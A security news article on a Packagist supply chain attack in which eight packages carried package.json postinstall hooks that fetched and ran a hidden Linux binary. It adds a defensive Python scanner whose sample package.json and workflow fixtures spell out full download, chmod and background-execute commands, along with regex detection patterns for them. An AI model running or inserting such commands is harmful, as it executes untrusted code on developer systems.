Supply Chain Attack Targets Packagist with Malicious Post-Install Scripts
A coordinated supply chain attack has compromised eight packages on **Packagist**, injecting malicious code into `package.json` files. The attack leverages post-install scripts to download and execute a Linux binary from a now-defunct GitHub repository, potentially compromising developer systems.
A new "coordinated" supply chain attack campaign has impacted eight packages on **Packagist**, adding malicious code designed to fetch a Linux binary from a GitHub Releases URL and run it.
"Although the affected packages were all Composer packages, the malicious code was not added to composer.json," **Socket** said. "Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code."

### Cross-Ecosystem Targeting
This "cross-ecosystem placement" makes the activity stand out: developers and security teams reviewing PHP dependencies may focus only on Composer-related metadata (`composer.json`, lock files) and skip the `package.json` lifecycle hooks bundled inside the same package. The `postinstall` hook is executed by npm, yarn, or pnpm, not by Composer, so the payload runs when someone installs the package's JavaScript dependencies, typically to build its front-end assets. The malicious versions have since been removed from Packagist.
An analysis of the packages found that their upstream repositories had been modified to include a `postinstall` script that downloads a Linux binary from a GitHub Releases URL (`github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f`), saves it under the hidden `/tmp/.sshd` folder, makes it executable for all users with `chmod`, and runs it in the background.
### Affected Packages
The affected packages and the compromised version of each are:
* moritz-sauer-13/silverstripe-cms-theme (dev-master)
* crosiersource/crosierlib-base (dev-master)
* devdojo/wave (dev-main)
* devdojo/genesis (dev-main)
* katanaui/katana (dev-main)
* elitedevsquad/sidecar-laravel (3.x-dev)
* r2luna/brain (dev-main)
* baskarcm/tzi-chat-ui (dev-main)

### Broader Campaign?
**Socket's** investigation found references to the same payload in 777 files on **GitHub**, suggesting a broader campaign. In at least two instances the payload was added to a GitHub Actions workflow file. It is not yet known how many of the 777 represent distinct compromises rather than forks, duplicate package artifacts, or cached references.
* [Instance 1](https://github.com/448776129/UA2F/blob/master/.github/workflows/ci.yml)
* [Instance 2](https://github.com/448776129/blog-1/blob/9ebac2e4118396b84e508585f356bf06971c4fb5/.github/workflows/deploy_coding.yml)
"This suggests the attacker was not relying on a single execution mechanism. In package artifacts, the payload was triggered through `package.json` `postinstall` scripts," the application security firm said. "In workflow files, it was positioned to run during GitHub Actions jobs."
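The `postinstall` hook described above and the workflow-file placement in the quote are two containers for the same fetch-and-execute pattern, so one check can cover both. The scanner below is an added example written for this article, not Socket's tooling and not code from any of the affected packages. It uses only the Python standard library; the package.json, workflow snippet, hidden-path names and release URL it runs on are constructed to mirror the described behaviour and are not taken from the campaign.

```python
"""Flag fetch-and-execute commands in package.json lifecycle hooks and in
GitHub Actions `run:` steps. Added example; sample inputs are constructed."""
import json
import re
from pathlib import Path

# npm/yarn/pnpm run these on `npm install`; Composer ignores them, which is why
# a package.json shipped inside a PHP package escapes a Composer-only review.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# One pattern per behaviour of the installer described in the article.
INDICATORS = (
    ("remote_fetch",      re.compile(r"\b(?:curl|wget)\b")),
    ("release_download",  re.compile(r"github\.com/[^\s'\"]+/releases/download/")),
    ("tmp_drop",          re.compile(r"/tmp/\.[\w.-]+")),          # hidden path under /tmp
    ("chmod_exec",        re.compile(r"\bchmod\s+(?:[ugoa]*\+[rwx]*x[rwx]*|[0-7]{3,4})\b")),
    # trailing single `&`, or nohup/setsid/disown; `&&` and `2>&1` are excluded
    ("background_exec",   re.compile(r"(?:\bnohup\b|\bsetsid\b|\bdisown\b|(?<!&)&(?!&)\s*(?:;|$))", re.M)),
    # curl -k / --insecure and wget --no-check-certificate (bundled forms like -sk not covered)
    ("tls_disabled",      re.compile(r"(?:--insecure|--no-check-certificate|(?<=\s)-k(?=\s))")),
    ("errors_suppressed", re.compile(r"(?:>\s*/dev/null|\|\|\s*true)")),
)


def indicators_for(command: str) -> list[str]:
    """Names of the indicators a shell command matches, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(command)]


def is_suspicious(found: list[str]) -> bool:
    """A lone curl/wget in a build hook is common; a fetch plus two further
    drop/chmod/background/evasion tells is what gets reported."""
    return "remote_fetch" in found and len(found) >= 3


def scan_package_json(text: str) -> dict[str, list[str]]:
    """Map each lifecycle hook defined in a package.json to its matched indicators."""
    scripts = json.loads(text).get("scripts") or {}
    return {h: indicators_for(c) for h, c in scripts.items() if h in LIFECYCLE_HOOKS}


RUN_LINE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")


def extract_run_steps(workflow_yaml: str) -> list[str]:
    """Pull `run:` commands out of a workflow without a YAML parser: inline
    scalars as-is, `|`/`>` block scalars gathered by indentation."""
    lines, steps, i = workflow_yaml.splitlines(), [], 0
    while i < len(lines):
        m = RUN_LINE.match(lines[i])
        i += 1
        if not m:
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest in ("|", "|-", ">", ">-"):
            block = []
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > indent):
                block.append(lines[i].strip())
                i += 1
            steps.append("\n".join(l for l in block if l))
        else:
            steps.append(rest)
    return steps


def scan_workflow(text: str) -> list[tuple[str, list[str]]]:
    """(command, indicators) for every run step in a workflow file."""
    return [(step, indicators_for(step)) for step in extract_run_steps(text)]


def scan_tree(root: Path) -> list[str]:
    """Walk a Composer project: every package.json Composer copied into
    vendor/<vendor>/<name>/, plus the repository's own workflow files."""
    findings = []
    for pj in root.glob("vendor/*/*/package.json"):
        for hook, found in scan_package_json(pj.read_text()).items():
            if is_suspicious(found):
                findings.append(f"{pj}: scripts.{hook}: {', '.join(found)}")
    for wf in root.glob(".github/workflows/*.y*ml"):
        for step, found in scan_workflow(wf.read_text()):
            if is_suspicious(found):
                findings.append(f"{wf}: run {step.splitlines()[0]!r}: {', '.join(found)}")
    return findings


# Constructed samples: the suspect hook mirrors the behaviour described in the
# article; the repository URL and file names are placeholders, not the attacker's.
BENIGN_PACKAGE_JSON = json.dumps({"name": "example-theme", "scripts": {
    "build": "vite build", "postinstall": "node scripts/patch-assets.js"}})
SUSPECT_PACKAGE_JSON = json.dumps({"name": "example-theme", "scripts": {
    "build": "vite build",
    "postinstall": "mkdir -p /tmp/.sshd && curl -k -sL "
                   "https://github.com/example-org/helper/releases/download/v1/gvfsd-network "
                   "-o /tmp/.sshd/gvfsd-network 2>/dev/null; chmod 777 /tmp/.sshd/gvfsd-network; "
                   "nohup /tmp/.sshd/gvfsd-network >/dev/null 2>&1 &"}})
SUSPECT_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: make
      - name: helper
        run: |
          curl -k -sL https://github.com/example-org/helper/releases/download/v1/gvfsd-network -o /tmp/.sshd 2>/dev/null
          chmod +x /tmp/.sshd
          /tmp/.sshd &
"""

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_PACKAGE_JSON), ("suspect", SUSPECT_PACKAGE_JSON)):
        for hook, found in scan_package_json(text).items():
            print(f"package.json ({label}) {hook}: {found} suspicious={is_suspicious(found)}")
    for step, found in scan_workflow(SUSPECT_WORKFLOW):
        print(f"workflow run {step.splitlines()[0]!r}: {found} suspicious={is_suspicious(found)}")
```

Run `scan_tree(Path("."))` from a Composer project root after `composer install`; the vendor glob reaches the `package.json` files Composer copies alongside the PHP code, which is exactly the place a Composer-only review never looks. The heuristic deliberately requires a download plus two further tells so that a plain `curl` in a build step is not reported, and the workflow extractor is indentation-based, so a hand-written YAML layout it does not anticipate should be checked with a real YAML parser.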
### Payload Analysis
The exact nature of the second-stage payload is unclear, as the GitHub account that hosted the repository is no longer available. The name chosen for the binary, "gvfsd-network", is notable: it is borrowed from a legitimate **GNOME** Virtual File System (**GVfs**) daemon responsible for browsing network shares, so the running process would not look out of place on a Linux desktop.
"Even without the second-stage binary, the malicious installer is enough to warrant blocking," **Socket** said. "It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background."